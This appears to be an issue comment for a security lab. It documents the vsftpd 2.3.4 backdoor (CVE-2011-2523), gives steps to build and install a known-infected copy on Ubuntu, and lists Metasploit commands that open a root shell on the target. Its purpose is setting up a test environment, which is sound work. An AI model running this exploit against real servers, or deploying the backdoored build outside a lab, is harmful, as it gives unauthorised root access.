a1668k
commented
1 year ago CVE-2011-2523 - vsftpd 2.3.4 backdoor shell
vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor that opens a shell on port 6200/tcp.
Tested, the exploit is valid by setting up vsftpd in Ubuntu 22.04.2 and exploit it in Kali Linux with Metasploit.
Installation Method (Ubuntu)
Download the vsftpd from Github. https://github.com/nikdubois/vsftpd-2.3.4-infected.git
cd ~/
git clone https://github.com/nikdubois/vsftpd-2.3.4-infected.git
sudo apt-get install build-essential
cd ~/vsftpd-2.3.4-infected
# We need to change the Makefile, we need to add the `-lcrypt` value as a linker flag
# LINK = -Wl,-s,-lcrypt
make
useradd nobody
mkdir /usr/share/empty
sudo cp vsftpd /usr/local/sbin/vsftpd
sudo cp vsftpd.8 /usr/local/man/man8
sudo cp vsftpd.conf.5 /usr/local/man/man5
sudo cp vsftpd.conf /etc
mkdir /var/ftp/
useradd -d /var/ftp ftp
chown root:root /var/ftp
chmod og-w /var/ftp
/usr/local/sbin/vsftpd &
# We need to enable local login to the vsftpd server by changing `/etc/vsftpd.conf`
# # Uncomment this to allow local users to log in.
# local_enable=YESReference: Hands-On AWS Penetration Testing with Kali Linux - OREILLY https://learning.oreilly.com/library/view/hands-on-aws-penetration/9781789136722/3079bfef-1db6-42da-b597-62a09470404a.xhtml
Exploitation Method
We can use Metasploit to run a exploit about vsftpd
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST <ip address of Ubuntu server>
exploit
# It will then provide an interactive reverse shell with root privilegesReference: Hands-On AWS Penetration Testing with Kali Linux - OREILLY https://learning.oreilly.com/library/view/hands-on-aws-penetration/9781789136722/4fdd1253-b5bb-4744-885e-43c98b80bbc5.xhtml https://westoahu.hawaii.edu/cyber/forensics-weekly-executive-summmaries/8424-2/
Find a vulnerable software with public exploit(available on exploitdb). Attacker gets
rootafter running the exploit.Only find it. Install this software in another issue.